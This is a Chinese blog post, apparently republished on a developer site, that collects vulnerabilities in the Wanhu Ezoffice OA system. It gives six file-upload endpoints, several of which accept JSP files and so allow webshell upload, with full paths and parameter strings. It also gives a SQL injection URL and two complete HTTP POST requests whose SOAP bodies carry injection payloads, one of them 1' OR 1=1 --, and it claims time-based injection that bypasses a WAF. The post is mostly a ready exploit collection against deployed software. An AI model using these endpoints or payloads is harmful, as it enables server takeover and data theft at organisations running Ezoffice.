万户Ezoffice 漏洞集合+0day

栏目: JSP · 发布时间: 7年前

内容简介：万户Ezoffice 漏洞集合+0day

老版本任意文件上传、Web Service SQLi、New Web Serivce SQLi

一、老版本的用户已经不多了

1、第一处上传点

/defaultroot/govezoffice/gov_documentmanager/senddocument_import.jsp

构造参数上传，构造fileType=jsp来完成上传。

利用第一处上传的表单，直接上传jsp文件；直接返回文件名，如图：（查看源代码）

文件在upload参数设置的“archives”： /defaultroot/upload/archives/

2、第二处上传点

/defaultroot/customize/formClassUpload.jsp

没有任何限制直接上传，上传后的文件名是原文件名。

存在 defaultroot/devform/customize/ 目录下查看源代码看文件名

3、第三处上传点(鸡肋)

/defaultroot/public/jsp/smartUploadPic.jsp

利用第三处的构造参数截断URL和上传的文件名#需服务器支持URL允许存在空字节！文件上传存在 /defaultroot/upload/archives/ 下

4、第四处上传点

/defaultroot/work_flow/jsFileUpload.jsp

后门！简直就是后门，只能上传jsp文件！∑(O_O；)

文件上传在： /defaultroot/devform/workflow/ 原上传文件名。

5、第五处上传点

/defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0

文件位置 /defaultroot/upload/information/

6、第六处上传点

/defaultroot/public/jsp/multiuploadfile.jsp?path=sound&mode=add&fileName=fileName&saveName=soundSaveName&tableName=soundTableName&fileMaxSize=0&photos=null

文件位置： /defaultroot/upload/sound/

二、SQLi

/defaultroot/public/select_user/search_org_list.jsp?searchName=

三、老版本Web Service SQLi

/defaultroot/xfservices/DealFileWebService

POST包：

POST /defaultroot/xfservices/DealFileWebService HTTP/1.1
    Host: www.*..cn:7890
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Cookie: LocLan=zh_CN
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 567

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://com.whir.mobile/DealFileWebService">     <SOAP-ENV:Header/>     <SOAP-ENV:Body>        <urn:getUserByAccount>           <urn:userAccount>1</urn:userAccount>        </urn:getUserByAccount>     </SOAP-ENV:Body></SOAP-ENV:Envelope>

四、New Web Service SQLi

老版本看到Web Service存在 SQL 注入后，想着去看看最新的版本。但是访问 xfservices 直接跳转首页，找不到Web Serivce了。

就去找了一下开发手册看看，你猜怎么着~๑乛◡乛๑

在Web Service Editor手工测试的时候，测试出来了存在SQL注入。

后来在抓包的时候遇到了坑，无法通过浏览器和burp直接抓包。(╯—﹏—)╯（┷━━━┷ 无法抓包，怎么愉快的丢SQLmap?

就去看了看漏洞库关于web service的注入漏洞，看到了几个例子需要中转脚本?(⊙⊙?)

怎么办,我不会写中转脚本。(╥╯^╰╥)

然后通过AWVS的HTTP Editor功能才知道，原来是有Referfer验证。所以加入Referfer就可以抓POST包丢SQLMAP了~

之前wooyun的需要中转脚本的Web Service 注入同理。

POST包：

POST /defaultroot/services/ExchangeService HTTP/1.1
Content-Type: text/xml
SOAPAction: ""
Content-Length: 788
X-Requested-With: XMLHttpRequest
Referer: http://oa.*.*.cn:7001/defaultroot/services/ExchangeService?wsdl
Host: oa.*.*.cn:7001
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://61.187.198.50:82/defaultroot/services/ExchangeService" xmlns:urn1="http://po.exchange.govezoffice.whir.com" xmlns:urn3="http://xml.apache.org/xml-soap">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <getExchangeUnitsByParameterAll>
         <unitLevel>1</unitLevel>
         <unitAccount>1' OR 1=1 -- </unitAccount>
         <orderBy>1</orderBy>
        </getExchangeUnitsByParameterAll>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

结果你猜怎么着,出来的是延时注入,surprise!!!还无视waf....嗷呜～ヾ(*´∇`)ﾉ

万户Ezoffice 漏洞集合+0day

以上所述就是小编给大家介绍的《万户Ezoffice 漏洞集合+0day》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对码农网的支持！

查看所有标签

猜你喜欢:

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

中国机器人

[中]王鸿鹏、[中]马娜 / 辽宁人民出版社 / 2017-1-1 / 48.00元

本书对中国机器人领域的发展历史做了引人入胜的介绍，中国机器人成长的过程也是中国经济由弱到强的历程。本书实际是选择了一个独特的视角来解读中国数十年的政治、经济、国家战略问题。中国的未来充满了多重可能性，本书对想了解中国当代与未来发展战略的读者是难得的读本，对智能制造这一当今世界*受关注的高科技领域在战略层面和科技伦理层面进行了深入地剖析和思考，其中提出的诸多前沿性观点是全球都将面对的问题，对中国科学......一起来看看《中国机器人》这本书的介绍吧!

码农工具

HTML 编码/解码

XML 在线格式化

在线 XML 格式化压缩工具